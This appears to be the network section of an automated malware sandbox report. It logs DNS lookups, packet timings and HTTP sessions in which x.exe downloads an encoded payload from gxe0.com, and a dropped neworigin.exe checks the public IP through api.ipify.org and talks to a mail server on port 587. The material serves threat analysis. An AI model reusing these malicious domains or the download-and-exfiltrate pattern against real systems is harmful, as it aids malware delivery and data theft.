                                                                                                              Nov 12, 2024 15:55:44.365950108 CET49806587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:55:44.366018057 CET49806587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:55:44.366055965 CET49806587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:55:44.366095066 CET49806587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:55:44.366138935 CET49806587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:55:44.366175890 CET49806587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:55:44.366214037 CET49806587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:55:44.366241932 CET49806587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:55:44.366265059 CET49806587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:55:44.366293907 CET49806587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:55:44.370985031 CET5874980651.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:55:44.371005058 CET5874980651.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:55:44.371016026 CET5874980651.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:55:44.371362925 CET5874980651.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:55:44.371407032 CET5874980651.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:55:44.371417046 CET5874980651.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:55:44.371433973 CET5874980651.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:55:44.371443987 CET5874980651.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:55:44.371459007 CET5874980651.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:55:44.371468067 CET5874980651.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:55:44.612095118 CET5874980651.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:55:44.657802105 CET49806587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:57:15.876959085 CET49806587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:57:15.882275105 CET5874980651.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:57:16.119728088 CET5874980651.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:57:16.120446920 CET49806587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:57:50.791552067 CET49998587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:57:50.796794891 CET5874999851.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:57:50.796920061 CET49998587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:57:52.116003036 CET5874999851.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:57:52.116137981 CET49998587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:57:52.121017933 CET5874999851.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:57:52.360385895 CET5874999851.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:57:52.360538960 CET49998587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:57:52.365403891 CET5874999851.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:57:52.604729891 CET5874999851.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:57:52.605237007 CET49998587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:57:52.610018015 CET5874999851.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:57:52.855288982 CET5874999851.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:57:52.855309963 CET5874999851.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:57:52.855328083 CET5874999851.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:57:52.855338097 CET5874999851.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:57:52.855391979 CET49998587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:57:52.858376026 CET49998587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:57:52.863183975 CET5874999851.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:57:53.102263927 CET5874999851.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:57:53.103779078 CET49998587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:57:53.108644009 CET5874999851.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:57:53.349112034 CET5874999851.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:57:53.350315094 CET49998587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:57:53.355294943 CET5874999851.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:57:53.596345901 CET5874999851.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:57:53.596601009 CET49998587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:57:53.601489067 CET5874999851.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:57:53.851104975 CET5874999851.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:57:53.851648092 CET49998587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:57:53.856650114 CET5874999851.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:57:54.095665932 CET5874999851.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:57:54.095937014 CET49998587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:57:54.100763083 CET5874999851.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:57:54.343574047 CET5874999851.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:57:54.343775988 CET49998587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:57:54.348650932 CET5874999851.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:57:54.587713003 CET5874999851.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:57:54.588207960 CET49998587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:57:54.588243961 CET49998587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:57:54.588330030 CET49998587192.168.2.651.195.88.199
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 12, 2024 15:55:01.180349112 CET | 55096 | 53 | 192.168.2.6 | 1.1.1.1
Nov 12, 2024 15:55:01.427781105 CET | 53 | 55096 | 1.1.1.1 | 192.168.2.6
Nov 12, 2024 15:55:09.795057058 CET | 51567 | 53 | 192.168.2.6 | 1.1.1.1
Nov 12, 2024 15:55:09.802222967 CET | 53 | 51567 | 1.1.1.1 | 192.168.2.6
Nov 12, 2024 15:55:12.558748007 CET | 53716 | 53 | 192.168.2.6 | 1.1.1.1
Nov 12, 2024 15:55:12.914112091 CET | 53 | 53716 | 1.1.1.1 | 192.168.2.6
Nov 12, 2024 15:55:31.573256016 CET | 64634 | 53 | 192.168.2.6 | 1.1.1.1
Nov 12, 2024 15:55:31.581523895 CET | 53 | 64634 | 1.1.1.1 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 12, 2024 15:55:01.180349112 CET | 192.168.2.6 | 1.1.1.1 | 0x7f0c | Standard query (0) | gxe0.com | A (IP address) | IN (0x0001) | false
Nov 12, 2024 15:55:09.795057058 CET | 192.168.2.6 | 1.1.1.1 | 0x1891 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
Nov 12, 2024 15:55:12.558748007 CET | 192.168.2.6 | 1.1.1.1 | 0xefb2 | Standard query (0) | s82.gocheapweb.com | A (IP address) | IN (0x0001) | false
Nov 12, 2024 15:55:31.573256016 CET | 192.168.2.6 | 1.1.1.1 | 0xd3cf | Standard query (0) | pywolwnvd.biz | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 12, 2024 15:55:01.427781105 CET | 1.1.1.1 | 192.168.2.6 | 0x7f0c | No error (0) | gxe0.com | | 198.252.105.91 | A (IP address) | IN (0x0001) | false
Nov 12, 2024 15:55:09.802222967 CET | 1.1.1.1 | 192.168.2.6 | 0x1891 | No error (0) | api.ipify.org | | 104.26.13.205 | A (IP address) | IN (0x0001) | false
Nov 12, 2024 15:55:09.802222967 CET | 1.1.1.1 | 192.168.2.6 | 0x1891 | No error (0) | api.ipify.org | | 104.26.12.205 | A (IP address) | IN (0x0001) | false
Nov 12, 2024 15:55:09.802222967 CET | 1.1.1.1 | 192.168.2.6 | 0x1891 | No error (0) | api.ipify.org | | 172.67.74.152 | A (IP address) | IN (0x0001) | false
Nov 12, 2024 15:55:12.914112091 CET | 1.1.1.1 | 192.168.2.6 | 0xefb2 | No error (0) | s82.gocheapweb.com | | 51.195.88.199 | A (IP address) | IN (0x0001) | false
Nov 12, 2024 15:55:31.581523895 CET | 1.1.1.1 | 192.168.2.6 | 0xd3cf | No error (0) | pywolwnvd.biz | | 54.244.188.177 | A (IP address) | IN (0x0001) | false
• gxe0.com
• api.ipify.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49710 | 198.252.105.91 | 443 | 6332 | C:\Users\user\Desktop\x.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-12 14:55:02 UTC | 161 | OUT | GET /yak/233_Wisrysxlfss HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
    Host: gxe0.com
2024-11-12 14:55:02 UTC | 365 | IN | HTTP/1.1 200 OK
    Connection: close
    last-modified: Mon, 28 Oct 2024 23:14:08 GMT
    accept-ranges: bytes
    content-length: 2562520
    date: Tue, 12 Nov 2024 14:55:02 GMT
    server: LiteSpeed
    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                              2024-11-12 14:55:02 UTC16384INData Raw: 70 71 36 6c 57 53 4f 6e 73 55 73 51 48 43 59 6b 48 42 41 6e 47 69 4d 6e 46 78 4d 56 4a 52 38 51 44 68 73 67 4a 53 49 67 48 78 49 58 44 68 55 61 49 42 59 61 4a 68 38 52 48 78 49 66 4a 68 77 5a 4a 43 49 6c 44 69 4d 6b 4a 79 4d 66 48 68 6b 61 4a 78 51 51 44 68 41 63 45 53 41 6e 4a 52 30 6c 49 52 51 50 46 69 41 51 4a 52 49 6e 4a 79 49 69 48 53 41 69 49 79 49 52 4a 52 59 63 4a 68 67 6d 48 51 38 52 46 78 49 63 48 42 63 6c 44 78 51 65 44 67 38 58 48 78 77 4f 49 69 45 65 48 52 4d 6a 4a 78 32 6d 72 71 56 5a 49 36 65 78 53 77 51 57 49 42 38 6d 49 43 55 5a 45 79 41 67 70 71 36 6c 57 53 4f 6e 73 55 75 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65
                                                                                                              Data Ascii: pq6lWSOnsUsQHCYkHBAnGiMnFxMVJR8QDhsgJSIgHxIXDhUaIBYaJh8RHxIfJhwZJCIlDiMkJyMfHhkaJxQQDhAcESAnJR0lIRQPFiAQJRInJyIiHSAiIyIRJRYcJhgmHQ8RFxIcHBclDxQeDg8XHxwOIiEeHRMjJx2mrqVZI6exSwQWIB8mICUZEyAgpq6lWSOnsUupnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbe
                                                                                                              2024-11-12 14:55:02 UTC16384INData Raw: 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79
                                                                                                              Data Ascii: q6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y
                                                                                                              2024-11-12 14:55:02 UTC16384INData Raw: 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61
                                                                                                              Data Ascii: s7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a
                                                                                                              2024-11-12 14:55:02 UTC16384INData Raw: 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f
                                                                                                              Data Ascii: n7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqO
                                                                                                              2024-11-12 14:55:02 UTC16384INData Raw: 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d
                                                                                                              Data Ascii: qKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprm
                                                                                                              2024-11-12 14:55:02 UTC16384INData Raw: 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65
                                                                                                              Data Ascii: sLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe
                                                                                                              2024-11-12 14:55:02 UTC16384INData Raw: 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53
                                                                                                              Data Ascii: u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKS
                                                                                                              2024-11-12 14:55:02 UTC16384INData Raw: 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69
                                                                                                              Data Ascii: q6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6i
                                                                                                              2024-11-12 14:55:02 UTC16384INData Raw: 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d
                                                                                                              Data Ascii: nbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm
                                                                                                              2024-11-12 14:55:02 UTC16384INData Raw: 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57
                                                                                                              Data Ascii: oKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKW


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49712 | 104.26.13.205 | 443 | 3796 | C:\Users\user\AppData\Local\Temp\neworigin.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-12 14:55:10 UTC | 155 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
    Host: api.ipify.org
    Connection: Keep-Alive
2024-11-12 14:55:10 UTC | 399 | IN | HTTP/1.1 200 OK
    Date: Tue, 12 Nov 2024 14:55:10 GMT
    Content-Type: text/plain
    Content-Length: 14
    Connection: close
    Vary: Origin
    cf-cache-status: DYNAMIC
    Server: cloudflare
    CF-RAY: 8e175c8b79822c98-DFW
    server-timing: cfL4;desc="?proto=TCP&rtt=2709&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2817&recv_bytes=769&delivery_rate=1846938&cwnd=238&unsent_bytes=0&cid=8ce15a732e678848&ts=276&x=0"
2024-11-12 14:55:10 UTC | 14 | IN | Data Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 38
    Data Ascii: 173.254.250.68


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 49750 | 104.26.13.205 | 443 | 2968 | C:\Users\user\AppData\Local\Temp\neworigin.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-12 14:55:25 UTC | 155 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
    Host: api.ipify.org
    Connection: Keep-Alive
2024-11-12 14:55:25 UTC | 399 | IN | HTTP/1.1 200 OK
    Date: Tue, 12 Nov 2024 14:55:25 GMT
    Content-Type: text/plain
    Content-Length: 14
    Connection: close
    Vary: Origin
    cf-cache-status: DYNAMIC
    Server: cloudflare
    CF-RAY: 8e175ce8b81647a8-DFW
    server-timing: cfL4;desc="?proto=TCP&rtt=1375&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2816&recv_bytes=769&delivery_rate=2162808&cwnd=251&unsent_bytes=0&cid=00cf1616bd302eeb&ts=602&x=0"
2024-11-12 14:55:25 UTC | 14 | IN | Data Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 38
    Data Ascii: 173.254.250.68


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.6 | 49781 | 104.26.13.205 | 443 | 5328 | C:\Users\user\AppData\Local\Temp\neworigin.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-12 14:55:33 UTC | 155 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
    Host: api.ipify.org
    Connection: Keep-Alive
2024-11-12 14:55:33 UTC | 399 | IN | HTTP/1.1 200 OK
    Date: Tue, 12 Nov 2024 14:55:33 GMT
    Content-Type: text/plain
    Content-Length: 14
    Connection: close
    Vary: Origin
    cf-cache-status: DYNAMIC
    Server: cloudflare
